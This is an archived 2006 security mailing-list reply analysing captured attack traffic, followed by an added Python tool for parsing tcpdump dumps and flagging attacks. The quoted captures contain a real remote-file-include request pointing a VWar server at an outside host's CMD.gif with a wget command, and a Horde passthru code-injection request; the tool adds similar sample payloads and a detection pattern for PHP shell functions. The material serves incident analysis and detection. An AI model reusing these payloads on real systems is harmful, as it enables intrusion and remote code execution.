Security Incidents mailing list archives
Re: Someone scanning for new PHP issues?
From: "Bojan Zdrnja" <bojan.zdrnja () gmail com>
Date: Sun, 16 Apr 2006 21:53:17 +1200
On 4/16/06, Jamie Riden <jamesr () europe com> wrote:
One of these might be the Horde exploit - http://isc.sans.org/diary.php?storyid=1262 - any ideas on the other?

cheers,
Jamie

02:38:43.817967 IP compromised.com.1044 > www.example.com.www: P 0:412(412) ack 1 win 65535
0x0000: 4500 01c4 a2ac 4000 7106 5012 0ca2 a1a1 E.....@.q.P.....
0x0010: 48e8 1e4a 0414 0050 ec05 5522 9e0c 2a9d H..J...P..U"..*.
0x0020: 5018 ffff 3431 0000 4745 5420 6874 7470 P...41..GET.http
0x0030: 3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f ://xx.yyy.30.74/
0x0040: 7677 6172 2f69 6e63 6c75 6465 732f 6765 vwar/includes/ge
0x0050: 745f 6865 6164 6572 2e70 6870 3f76 7761 t_header.php?vwa
0x0060: 725f 726f 6f74 3d68 7474 703a 2f2f 7870 r_root=http://xp
0x0070: 6c2e 6e65 746d 6973 7068 6572 6532 2e63 l.netmisphere2.c
0x0080: 6f6d 2f43 4d44 2e67 6966 3f26 636d 643d om/CMD.gif?&cmd=
0x0090: 7767 6574 2048 5454 502f 312e 300d 0a48 wget.HTTP/1.0.
This is a VWar vulnerability in the get_header.php file (remote file include vulnerability). More info at http://www.securityfocus.com/bid/17358/info.
02:38:43.841958 IP compromised.com.1047 > www.example.com.www: P 1205950111:1205950537(426) ack 2648749032 win 65535
0x0000: 4500 01d2 a2b9 4000 7206 4ef7 0ca2 a1a1 E.....@.r.N.....
0x0010: 48e8 1e4a 0417 0050 47e1 569f 9de0 b3e8 H..J...PG.V.....
0x0020: 5018 ffff 1fd8 0000 4745 5420 6874 7470 P.......GET.http
0x0030: 3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f ://xx.yyy.30.74/
0x0040: 7765 626d 6169 6c2f 686f 7264 652f 7365 webmail/horde/se
0x0050: 7276 6963 6573 2f68 656c 702f 3f73 686f rvices/help/?sho
0x0060: 773d 6162 6f75 7426 6d6f 6475 6c65 3d3b w=about&module=;
0x0070: 2532 322e 7061 7373 7468 7275 2825 3232 %22.passthru(%22
0x0080: 6563 686f 2532 3049 524f 434b 5448 4557 echo%20IROCKTHEW
0x0090: 4f52 4c44 2532 3229 3b27 2e20 4854 5450 ORLD%22);'..HTTP
0x00a0: 2f31 2e30 0d0a 486f 7374 3a20 3732 2e32 /1.0..Host:.72.2
0x00b0: 3332 2e33 302e 3734 0d0a 5265 6665 7265 32.30.74..
This is, as you wrote above, the Horde Help Viewer remote PHP code execution vulnerability. More info at http://www.securityfocus.com/bid/17292. Unfortunately, exploits are in the wild, and the Horde one is especially bad (knowing that Horde is used a lot).

Cheers,
Bojan
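An added example (not part of the thread): a small Python tool that rebuilds the HTTP request from tcpdump -X output like the captures quoted above, including the xx/yy redaction and the case where a mail client has run the dump onto one line, and flags the two patterns Bojan identifies, a URL passed in a query parameter (remote file include) and a PHP function call inside a parameter value. The packet headers, the attacker.invalid host and the sample requests are constructed to match the captures; none of it is code from the list.

```python
import re
from urllib.parse import unquote_plus, urlsplit
# Constructed sample modelled on the thread's first capture: 20-byte IPv4 and TCP
# headers in front of the HTTP request; attacker.invalid is a placeholder host.
HDRS = bytes.fromhex("4500 00b1 0001 0000 4006 0000 c0a8 0001 c0a8 0002"
                     "0414 0050 0000 0001 0000 0001 5018 ffff 0000 0000")
REQUEST = (b"GET http://xx.yyy.30.74/vwar/includes/get_header.php"
           b"?vwar_root=http://attacker.invalid/CMD.gif?&cmd=wget HTTP/1.0\r\n"
           b"Host: xx.yyy.30.74\r\n\r\n")
HORDE_REQUEST = (b"GET /webmail/horde/services/help/?show=about&module=;"
                 b"%22.passthru(%22echo%20IROCKTHEWORLD%22);'. HTTP/1.0\r\n\r\n")
GROUP = re.compile(r"^(?:[0-9a-fA-Fxy]{2}){1,2}$")  # two-byte group, maybe redacted
PHP_CALLS = re.compile(r"\b(passthru|system|exec|shell_exec)\s*\(", re.I)
def render_hexdump(pkt: bytes) -> str:
    """Lay bytes out the way tcpdump -X does: offset, two-byte groups, ASCII."""
    lines = []
    for off in range(0, len(pkt), 16):
        chunk = pkt[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 33 <= b < 127 else "." for b in chunk)
        lines.append(f"0x{off:04x}:  {groups:<39} {text}")
    return "\n".join(lines)

def parse_hexdump(text: str) -> bytes:
    """Rebuild the packet from tcpdump -X text, even when a mail client has run
    it onto one line; redacted octets (xx/yy, as in the post) become '?'."""
    out = bytearray()
    for line in re.findall(r"0x[0-9a-fA-F]{4}:((?:\s+\S+){1,9})", text):
        for tok in line.split()[:8]:  # up to 8 groups, then the ASCII column
            if not GROUP.match(tok):
                break
            for i in range(0, len(tok), 2):
                out.append(0x3F if set(tok[i:i + 2]) & set("xy") else int(tok[i:i + 2], 16))
    return bytes(out)
def tcp_payload(pkt: bytes) -> bytes:
    """Skip the IPv4 and TCP headers using their own length fields."""
    ihl = (pkt[0] & 0x0F) * 4
    return pkt[ihl + (pkt[ihl + 12] >> 4) * 4:]

def classify_request(payload: bytes) -> list:
    """Flag a URL handed to a query parameter (RFI) or PHP code inside one."""
    parts = payload.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    findings = []
    for pair in urlsplit(parts[1] if len(parts) == 3 else "").query.split("&"):
        name, _, value = unquote_plus(pair).partition("=")
        if re.match(r"(https?|ftp)://", value, re.I):
            findings.append(f"remote file include via {name}={value}")
        if PHP_CALLS.search(value):
            findings.append(f"PHP code injection via {name}={value}")
    return findings
```

Feed `classify_request(tcp_payload(parse_hexdump(dump)))` a pasted capture to get the findings list; `render_hexdump` exists only to produce the constructed sample in tcpdump's layout.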